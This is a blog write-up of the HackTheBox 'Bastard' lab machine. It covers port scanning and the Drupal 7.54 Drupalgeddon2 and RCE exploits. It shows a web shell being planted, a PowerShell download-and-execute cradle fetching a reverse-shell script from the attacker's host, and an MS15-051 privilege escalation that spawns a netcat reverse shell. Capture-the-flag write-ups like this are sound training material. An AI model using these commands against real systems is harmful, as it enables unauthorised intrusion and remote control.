<!DOCTYPE html>
<html lang="en-us">
    <head><meta charset='utf-8'>
<meta name='viewport' content='width=device-width, initial-scale=1'><meta name='description' content='[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Windows 🌐Difficulty : Medium :first_quarter_moon:Owner : ch4pIP : 10.10.10.9[&#43;] PART 1 - GAIN ACCESS The first step is scanning machine&amp;rsquo;s ports with nmap:
 nmap -p- &amp;ndash;open -T5 -n 10.10.10.9
 PORT STATE SERVICE80/tcp open http135/tcp open msrpc49154/tcp open unknownOnce seen open ports, let&amp;rsquo;s get a deeper scan :'><title>[11] Bastard Hackthebox</title>

<link rel='canonical' href='https://example.com/posts/bastard-hackthebox/'>

<link rel="stylesheet" href="/scss/style.min.css"><meta property='og:title' content='[11] Bastard Hackthebox'>
<meta property='og:description' content='[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Windows 🌐Difficulty : Medium :first_quarter_moon:Owner : ch4pIP : 10.10.10.9[&#43;] PART 1 - GAIN ACCESS The first step is scanning machine&amp;rsquo;s ports with nmap:
 nmap -p- &amp;ndash;open -T5 -n 10.10.10.9
 PORT STATE SERVICE80/tcp open http135/tcp open msrpc49154/tcp open unknownOnce seen open ports, let&amp;rsquo;s get a deeper scan :'>
<meta property='og:url' content='https://example.com/posts/bastard-hackthebox/'>
<meta property='og:site_name' content='Maikypedia'>
<meta property='og:type' content='article'><meta property='article:section' content='Posts' /><meta property='article:published_time' content='2021-03-29T04:32:03&#43;02:00'/><meta property='article:modified_time' content='2021-03-29T04:32:03&#43;02:00'/>
<meta name="twitter:title" content="[11] Bastard Hackthebox">
<meta name="twitter:description" content="[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Windows 🌐Difficulty : Medium :first_quarter_moon:Owner : ch4pIP : 10.10.10.9[&#43;] PART 1 - GAIN ACCESS The first step is scanning machine&amp;rsquo;s ports with nmap:
 nmap -p- &amp;ndash;open -T5 -n 10.10.10.9
 PORT STATE SERVICE80/tcp open http135/tcp open msrpc49154/tcp open unknownOnce seen open ports, let&amp;rsquo;s get a deeper scan :">
    </head>
    <body class="article-page keep-sidebar">
    <script>
        (function() {
            const colorSchemeKey = 'StackColorScheme';
            if(!localStorage.getItem(colorSchemeKey)){
                localStorage.setItem(colorSchemeKey, "auto");
            }
        })();
    </script><script>
    (function() {
        const colorSchemeKey = 'StackColorScheme';
        const colorSchemeItem = localStorage.getItem(colorSchemeKey);
        const supportDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches === true;

        if (colorSchemeItem == 'dark' || colorSchemeItem === 'auto' && supportDarkMode) {
            

            document.body.dataset.scheme = 'dark';
        } else {
            document.body.dataset.scheme = 'light';
        }
    })();
</script><div class="container main-container flex on-phone--column extended ">
            <aside class="sidebar left-sidebar sticky">
    <button class="hamburger hamburger--spin" type="button" id="toggle-menu" aria-label="Toggle Menu">
        <span class="hamburger-box">
            <span class="hamburger-inner"></span>
        </span>
    </button>

    <header class="site-info">
        
            <figure class="site-avatar">
                
                    
                    
                    
                        
                        <img src="/img/maiky_hue62232bf39c5ba17479eab350663cd81_63325_300x0_resize_q75_box.jpeg" width="300"
                            height="300" class="site-logo" loading="lazy" alt="Avatar">
                    
                

                
                    <span class="emoji">🕵️</span>
                
            </figure>
        
        <h1 class="site-name"><a href="https://example.com">Maikypedia</a></h1>
        <h2 class="site-description">I&#39;m Maiky...</h2>
    </header>

    <ol class="menu" id="main-menu">
        
        
        

        <li >
            <a href='/posts'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-home" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <polyline points="5 12 3 12 12 3 21 12 19 12" />
  <path d="M5 12v7a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-7" />
  <path d="M9 21v-6a2 2 0 0 1 2 -2h2a2 2 0 0 1 2 2v6" />
</svg>



                
                <span>Home</span>
            </a>
        </li>
        
        

        <li >
            <a href='/categories/hack-the-box'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="24" height="24" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24" style="-ms-transform: rotate(360deg); -webkit-transform: rotate(360deg); transform: rotate(360deg);"><path d="M11.996 0a1.119 1.119 0 0 0-.057.003a.9.9 0 0 0-.236.05a.907.907 0 0 0-.165.079L1.936 5.675a.889.889 0 0 0-.445.77V17.556a.889.889 0 0 0 .47.784l9.598 5.541l.054.029v.002a.857.857 0 0 0 .083.035l.012.004c.028.01.056.018.085.024c.01.001.011.003.016.004a.93.93 0 0 0 .296.015a.683.683 0 0 0 .086-.015c.01 0 .011-.002.016-.004a.94.94 0 0 0 .085-.024l.012-.004a.882.882 0 0 0 .083-.035v-.002a1.086 1.086 0 0 0 .054-.029l9.599-5.541a.889.889 0 0 0 .469-.784V6.48l-.001-.026v-.008a.889.889 0 0 0-.312-.676l-.029-.024c0-.002-.01-.005-.01-.007a.899.899 0 0 0-.107-.07L12.453.127A.887.887 0 0 0 11.99 0zm.01 2.253c.072 0 .144.019.209.056l6.537 3.774a.418.418 0 0 1 0 .724l-6.537 3.774a.418.418 0 0 1-.418 0L5.26 6.807a.418.418 0 0 1 0-.724l6.537-3.774a.42.42 0 0 1 .209-.056zm-8.08 6.458a.414.414 0 0 1 .215.057l6.524 3.766a.417.417 0 0 1 .208.361v7.533a.417.417 0 0 1-.626.361l-6.523-3.766a.417.417 0 0 1-.209-.362V9.13c0-.241.196-.414.41-.418zm16.16 0c.215.004.41.177.41.418v7.532c0 .15-.08.287-.208.362l-6.524 3.766a.417.417 0 0 1-.626-.361v-7.533c0-.149.08-.286.209-.36l6.523-3.767a.415.415 0 0 1 .216-.057z" fill="#626262"/><rect x="0" y="0" width="24" height="24" fill="rgba(0, 0, 0, 0)" /></svg>
                
                <span>HackTheBox</span>
            </a>
        </li>
        
        

        <li >
            <a href='https://www.instagram.com/c.pasttor/'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M12 2.163c3.204 0 3.584.012 4.85.07 3.252.148 4.771 1.691 4.919 4.919.058 1.265.069 1.645.069 4.849 0 3.205-.012 3.584-.069 4.849-.149 3.225-1.664 4.771-4.919 4.919-1.266.058-1.644.07-4.85.07-3.204 0-3.584-.012-4.849-.07-3.26-.149-4.771-1.699-4.919-4.92-.058-1.265-.07-1.644-.07-4.849 0-3.204.013-3.583.07-4.849.149-3.227 1.664-4.771 4.919-4.919 1.266-.057 1.645-.069 4.849-.069zm0-2.163c-3.259 0-3.667.014-4.947.072-4.358.2-6.78 2.618-6.98 6.98-.059 1.281-.073 1.689-.073 4.948 0 3.259.014 3.668.072 4.948.2 4.358 2.618 6.78 6.98 6.98 1.281.058 1.689.072 4.948.072 3.259 0 3.668-.014 4.948-.072 4.354-.2 6.782-2.618 6.979-6.98.059-1.28.073-1.689.073-4.948 0-3.259-.014-3.667-.072-4.947-.196-4.354-2.617-6.78-6.979-6.98-1.281-.059-1.69-.073-4.949-.073zm0 5.838c-3.403 0-6.162 2.759-6.162 6.162s2.759 6.163 6.162 6.163 6.162-2.759 6.162-6.163c0-3.403-2.759-6.162-6.162-6.162zm0 10.162c-2.209 0-4-1.79-4-4 0-2.209 1.791-4 4-4s4 1.791 4 4c0 2.21-1.791 4-4 4zm6.406-11.845c-.796 0-1.441.645-1.441 1.44s.645 1.44 1.441 1.44c.795 0 1.439-.645 1.439-1.44s-.644-1.44-1.439-1.44z"/></svg>
                
                <span>Instagram</span>
            </a>
        </li>
        
        

        <li >
            <a href='https://twitter.com/Maiky_py'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M24 4.557c-.883.392-1.832.656-2.828.775 1.017-.609 1.798-1.574 2.165-2.724-.951.564-2.005.974-3.127 1.195-.897-.957-2.178-1.555-3.594-1.555-3.179 0-5.515 2.966-4.797 6.045-4.091-.205-7.719-2.165-10.148-5.144-1.29 2.213-.669 5.108 1.523 6.574-.806-.026-1.566-.247-2.229-.616-.054 2.281 1.581 4.415 3.949 4.89-.693.188-1.452.232-2.224.084.626 1.956 2.444 3.379 4.6 3.419-2.07 1.623-4.678 2.348-7.29 2.04 2.179 1.397 4.768 2.212 7.548 2.212 9.142 0 14.307-7.721 13.995-14.646.962-.695 1.797-1.562 2.457-2.549z"/></svg>
                
                <span>Twitter</span>
            </a>
        </li>
        
        

        <li >
            <a href='/about/whoami'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-user" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="7" r="4" />
  <path d="M6 21v-2a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4v2" />
</svg>



                
                <span>Whoami</span>
            </a>
        </li>
        

        
            <li id="dark-mode-toggle">
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-left" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="8" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-right" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="16" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                <span>Dark Mode</span>
            </li>
        
    </ol>
</aside>

            <main class="main full-width">
    <article class="main-article">
    <header class="article-header">

    <div class="article-details">
    
    <header class="article-category">
        
            <a href="/categories/hack-the-box/" >
                Hack-The-Box
            </a>
        
    </header>
    

    <h2 class="article-title">
        <a href="/posts/bastard-hackthebox/">[11] Bastard Hackthebox</a>
    </h2>

    <footer class="article-time">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-clock" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <polyline points="12 7 12 12 15 15" />
</svg>



        <time class="article-time--published">Mar 29, 2021</time>
    </footer></div>
</header>

    <section class="article-content">
    <p><img src="/static/HACKING/bastard-index.jpg" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<h1 id="-index">[*] INDEX:</h1>
<ul>
<li><a class="link" href="#-box-info--" >BOX INFO</a></li>
<li><a class="link" href="#-part-1---gain-access" >GAINING ACCESS</a></li>
<li><a class="link" href="#-part-2---privesc" >PRIVILEGE ESCALATION</a></li>
</ul>
<h1 id="-box-info-computer-">[+] BOX INFO :computer: :</h1>
<pre><code>Operative System : Windows 🌐
Difficulty : Medium :first_quarter_moon:
Owner : ch4p
IP : 10.10.10.9
</code></pre><h1 id="-part-1---gain-access">[+] PART 1 - GAIN ACCESS</h1>
<p>The first step is scanning machine&rsquo;s ports with nmap:</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=nmap&#43;-p-&#43;--open&#43;-T5&#43;-n&#43;10.10.10.9"  target="_blank" rel="noopener"
    >nmap -p- &ndash;open -T5 -n 10.10.10.9</a></p>
</blockquote>
<pre><code>PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
49154/tcp open  unknown
</code></pre><p>Once seen open ports, let&rsquo;s get a deeper scan :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=nmap&#43;-sC&#43;-sV&#43;-sS&#43;-p80%2C135%2C49154&#43;10.10.10.9"  target="_blank" rel="noopener"
    >nmap -sV -sC -sS -p80,135,49154 10.10.10.9</a></p>
</blockquote>
<pre><code>PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
</code></pre><p>Here we just can point out the http server, so, let&rsquo;s check it :</p>
<p><img src="/static/HACKING/bastard-1.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>We can see a content manager called Drupal, we see that the service version is the 7, but this is nos specified, so, let&rsquo;s get a Drupal Scanner to get it&rsquo;s service :</p>
<p>In my case I used a <a class="link" href="https://github.com/immunIT/drupwn"  target="_blank" rel="noopener"
    >github script</a> :</p>
<blockquote>
<p>./drupwn &ndash;mode enum &ndash;target http://10.10.10.9</p>
</blockquote>
<p><img src="/static/HACKING/bastard-2.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Nice, so the Drupal version running on the website is the <code>7.54</code>. Let&rsquo;s search for an exploit for this version :</p>
<p><img src="/static/HACKING/bastard-3.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>I found a ruby exploit which looks good, let&rsquo;s execute it :</p>
<blockquote>
<p>ruby drupalgeddon2.rb http://10.10.10.9/</p>
</blockquote>
<p><img src="/static/HACKING/bastard-4.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Yeah! We got a shell as the &ldquo;iusr&rdquo;, but this shell works too slow, so I decided to search for another one.</p>
<p><img src="/static/HACKING/bastard-5.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>This php RCE exploit looks interesting, but probably we need to change some parameters, let&rsquo;s inspect the script:</p>
<p>Looking inside the script I found this :</p>
<div class="highlight"><pre class="chroma"><code class="language-php" data-lang="php"><span class="nv">$url</span> <span class="o">=</span> <span class="s1">&#39;http://vmweb.lan/drupal-7.54&#39;</span><span class="p">;</span> <span class="o">&lt;--</span> <span class="nx">Change</span> <span class="k">this</span> <span class="nx">to</span> <span class="nx">http</span><span class="o">://</span><span class="mf">10.10</span><span class="o">.</span><span class="mf">10.9</span>
<span class="nv">$endpoint_path</span> <span class="o">=</span> <span class="s1">&#39;/rest_endpoint&#39;</span><span class="p">;</span>
<span class="nv">$endpoint</span> <span class="o">=</span> <span class="s1">&#39;rest_endpoint&#39;</span><span class="p">;</span>
</code></pre></div><p>/rest_endpoint looks interesting, let&rsquo;s see in the browser what&rsquo;s in there :</p>
<p><img src="/static/HACKING/bastard-6.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Hmmm here it says that it doesn&rsquo;t exists, without this endpoint our script won&rsquo;t work, so let&rsquo;s tru to fuzz the website to find the &ldquo;real&rdquo; rest_enpoint, in my case I&rsquo;ll be using <code>wfuzz</code> :</p>
<blockquote>
<p>wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.9/FUZZ &ndash;hc=404 -L</p>
</blockquote>
<div class="highlight"><pre class="chroma"><code class="language-s" data-lang="s"><span class="o">********************************************************</span>
<span class="o">*</span> <span class="n">Wfuzz</span> <span class="m">3.1.0</span> <span class="o">-</span> <span class="n">The</span> <span class="n">Web</span> <span class="n">Fuzzer</span>                         <span class="o">*</span>
<span class="o">********************************************************</span>

<span class="n">Target</span><span class="o">:</span> <span class="n">http</span><span class="o">://</span><span class="m">10.10.10.9</span><span class="o">/</span><span class="n">FUZZ</span>
<span class="n">Total</span> <span class="n">requests</span><span class="o">:</span> <span class="m">207643</span>

<span class="o">=====================================================================</span>
<span class="n">ID</span>           <span class="n">Response</span>   <span class="n">Lines</span>    <span class="n">Word</span>       <span class="n">Chars</span>       <span class="n">Payload</span>                                           
<span class="o">=====================================================================</span>
                                                        
<span class="m">000000014</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">159</span> <span class="n">L</span>    <span class="m">413</span> <span class="n">W</span>      <span class="m">7583</span> <span class="n">Ch</span>     <span class="s">&#34;http://10.10.10.9&#34;</span>                                                         
<span class="m">000000125</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">152</span> <span class="n">L</span>    <span class="m">394</span> <span class="n">W</span>      <span class="m">7420</span> <span class="n">Ch</span>     <span class="s">&#34;user&#34;</span>                                                                            
<span class="m">000000124</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">159</span> <span class="n">L</span>    <span class="m">413</span> <span class="n">W</span>      <span class="m">7583</span> <span class="n">Ch</span>     <span class="s">&#34;0&#34;</span>                                                                               
<span class="m">000000352</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">159</span> <span class="n">L</span>    <span class="m">413</span> <span class="n">W</span>      <span class="m">7583</span> <span class="n">Ch</span>     <span class="s">&#34;node&#34;</span>                                                                                
<span class="m">000004935</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">0</span> <span class="n">L</span>      <span class="m">7</span> <span class="n">W</span>        <span class="m">62</span> <span class="n">Ch</span>       <span class="s">&#34;rest&#34;</span>     
</code></pre></div><p>Oh, maybe rest is our endpoint, let&rsquo;s change that part of the code :</p>
<div class="highlight"><pre class="chroma"><code class="language-php" data-lang="php"><span class="nv">$url</span> <span class="o">=</span> <span class="s1">&#39;http://10.10.10.9&#39;</span><span class="p">;</span> 
<span class="nv">$endpoint_path</span> <span class="o">=</span> <span class="s1">&#39;/rest&#39;</span><span class="p">;</span>
<span class="nv">$endpoint</span> <span class="o">=</span> <span class="s1">&#39;rest_endpoint&#39;</span><span class="p">;</span>
</code></pre></div><p>If we keep looking the script, we find this :</p>
<div class="highlight"><pre class="chroma"><code class="language-php" data-lang="php"><span class="nv">$file</span> <span class="o">=</span> <span class="p">[</span>
    <span class="s1">&#39;filename&#39;</span> <span class="o">=&gt;</span> <span class="s1">&#39;dixuSOspsOUU.php&#39;</span><span class="p">,</span>
    <span class="s1">&#39;data&#39;</span> <span class="o">=&gt;</span> <span class="s1">&#39;&lt;?php eval(file_get_contents(\&#39;php://input\&#39;)); ?&gt;&#39;</span>
<span class="p">];</span>
</code></pre></div><p>Here is where the exploit sets the payload, and we can change it a bit to get a shell with a parameter.</p>
<div class="highlight"><pre class="chroma"><code class="language-php" data-lang="php"><span class="nv">$file</span> <span class="o">=</span> <span class="p">[</span>
    <span class="s1">&#39;filename&#39;</span> <span class="o">=&gt;</span> <span class="s1">&#39;shell.php&#39;</span><span class="p">,</span>
    <span class="s1">&#39;data&#39;</span> <span class="o">=&gt;</span> <span class="s1">&#39;&lt;?php system($_REQUEST[&#34;cmd&#34;]); ?&gt;&#39;</span>
<span class="p">];</span>
</code></pre></div><p>Let&rsquo;s try to run the script&hellip;</p>
<p><img src="/static/HACKING/bastard-7.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Nice, it seems to have worked, let&rsquo;s try to run a command in the browser :</p>
<p><img src="/static/HACKING/bastard-8.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Yes! It worked! Now let&rsquo;s try to get a reverse shell, I&rsquo;ll be using <a class="link" href="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1"  target="_blank" rel="noopener"
    >Invoke-PowerShellTcp.ps1</a> from nishang, all we have to do to set the script up is adding the function at the bottom of the code, like this :</p>
<p><img src="/static/HACKING/bastard-9.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Now we&rsquo;ll be running that script with victim&rsquo;s powershell, using IEX (Invoke-Expression). We put this on the website but first we have to open a python http.server to share the file, and then powershell will get the file you&rsquo;re sharing and execute it :</p>
<h3 id="from-our-local-machine-">From our local machine :</h3>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=python3&#43;-m&#43;http.server"  target="_blank" rel="noopener"
    >python3 -m http.server</a></p>
</blockquote>
<p>And start listening from our pott 8989</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=rlwrap&#43;nc&#43;-lvnp&#43;8989"  target="_blank" rel="noopener"
    >rlwrap nc -lvnp 8989</a></p>
</blockquote>
<h3 id="from-the-victime-machine-">From the victime machine :</h3>
<blockquote>
<p>http://10.10.10.9/shell.php?cmd=C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe iex (New-Object Net.WebClient).DownloadString(&lsquo;http://10.10.14.36:8000/Invoke-PowerShellTcp.ps1)</p>
</blockquote>
<p><img src="/static/HACKING/bastard-10.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>And yeah! It worked :smile:</p>
<h1 id="-part-2---privesc">[+] PART 2 - PRIVESC</h1>
<p>Now running <code>sysinfo</code> we can get this :</p>
<pre><code>Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00496-001-0001283-84782
Original Install Date:     18/3/2017, 7:04:46 ??
System Boot Time:          28/3/2021, 1:51:13 ??
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.514 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.541 MB
Virtual Memory: In Use:    554 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9
</code></pre><p>Hmmm windows server 2008 sounds quite familiar, maybe it&rsquo;s vulnerable to some kind of kernel exploit? Let&rsquo;s get a Vuln-Scan script for this, in my case I&rsquo;ll be using <a class="link" href="https://github.com/rasta-mouse/Sherlock/blob/master/Sherlock.ps1"  target="_blank" rel="noopener"
    >Sherlock.ps1</a>. Inspecting Sherlock code, we find a function called &ldquo;Find-AllVulns&rdquo;, just put it at the bottom as we did with the reverse shell :</p>
<p><img src="/static/HACKING/bastard-11.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Let&rsquo;s start a python http server again and get the file from the browser :</p>
<h3 id="from-our-local-machine--1">From our local machine :</h3>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=python3&#43;-m&#43;http.server"  target="_blank" rel="noopener"
    >python3 -m http.server</a></p>
</blockquote>
<h3 id="from-the-victim-browser-">From the victim browser :</h3>
<blockquote>
<p>http://10.10.10.9/shell.php?cmd=powershell%20iex%20(New-Object%20Net.WebClient).DownloadString(%27http://10.10.14.36:8000/Sherlock.ps1%27)</p>
</blockquote>
<p>Once done that, we can run commands as sudo as we can see here :</p>
<p><img src="/static/HACKING/bastard-12.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>But we&rsquo;re not actually getting a shell, victim machine doesn&rsquo;t have netcat, so let&rsquo;s download a <a class="link" href="https://github.com/int0x33/nc.exe/blob/master/nc64.exe?source=post_page-----a2ddc3557403----------------------"  target="_blank" rel="noopener"
    >netcat64 binary</a> and get it into the victim system.</p>
<h3 id="from-our-local-machine--2">From our local machine :</h3>
<blockquote>
<p>impacket-smbserver id binaries/</p>
</blockquote>
<h3 id="from-the-victim-browser--1">From the victim browser :</h3>
<blockquote>
<p>copy \10.10.14.36\id\nc64.exe</p>
</blockquote>
<p>And get a reverse shell:</p>
<p><img src="/static/HACKING/bastard-13.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>I don&rsquo;t know why this is not actually running, but we can try luck in the browser.</p>
<blockquote>
<p>http://10.10.10.9/shell.php?cmd=ms15-051x64.exe%20%22nc64.exe%20-e%20cmd%2010.10.14.36%204444%22</p>
</blockquote>
<p><img src="/static/HACKING/bastard-14.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p><img src="/static/HACKING/bastard-15.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<h1 id="thanks-for-reading--">THANKS FOR READING 😊 !!</h1>

</section>


    <footer class="article-footer">
    

    
    <section class="article-copyright">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copyright" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <path d="M14.5 9a3.5 4 0 1 0 0 6" />
</svg>



        <span>Licensed under CC BY-NC-SA 4.0</span>
    </section>
    </footer>

    
</article>

     
        
    <div class="disqus-container">
    <div id="disqus_thread"></div>
<script type="application/javascript">
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "hugo-theme-stack" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
</div>

<style>
    .disqus-container {
        background-color: var(--card-background);
        border-radius: var(--card-border-radius);
        box-shadow: var(--shadow-l1);
        padding: var(--card-padding);
    }
</style>

<script>
    window.addEventListener('onColorSchemeChange', (e) => {
        if (DISQUS) {
            DISQUS.reset({
                reload: true
            });
        }
    })
</script>

    

    <footer class="site-footer">
    <section class="copyright">
        &copy; 
        
            2020 - 
        
        2021 Maikypedia
    </section>
    
    <section class="powerby">
        Built with <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> <br />
        Theme <b><a href="https://github.com/CaiJimmy/hugo-theme-stack" target="_blank" rel="noopener" data-version="2.3.0">Stack</a></b> designed by <a href="https://jimmycai.com" target="_blank" rel="noopener">Jimmy</a>
    </section>
</footer>

    
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    
    <div class="pswp__bg"></div>

    
    <div class="pswp__scroll-wrap">

        
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                
                
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"integrity="sha256-ePwmChbbvXbsO02lbM3HoHbSHTHFAeChekF1xKJdleo="crossorigin="anonymous"
                defer="true"
                >
            </script><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"integrity="sha256-UKkzOn/w1mBxRmLLGrSeyB4e1xbrp4xylgAWb3M42pU="crossorigin="anonymous"
                defer="true"
                >
            </script><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.css"integrity="sha256-c0uckgykQ9v5k&#43;IqViZOZKc47Jn7KQil4/MP3ySA3F8="crossorigin="anonymous"
            ><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.css"integrity="sha256-SBLU4vv6CA6lHsZ1XyTdhyjJxCjPif/TRkjnsyGAGnE="crossorigin="anonymous"
            >

            </main>
        </div>
        <script 
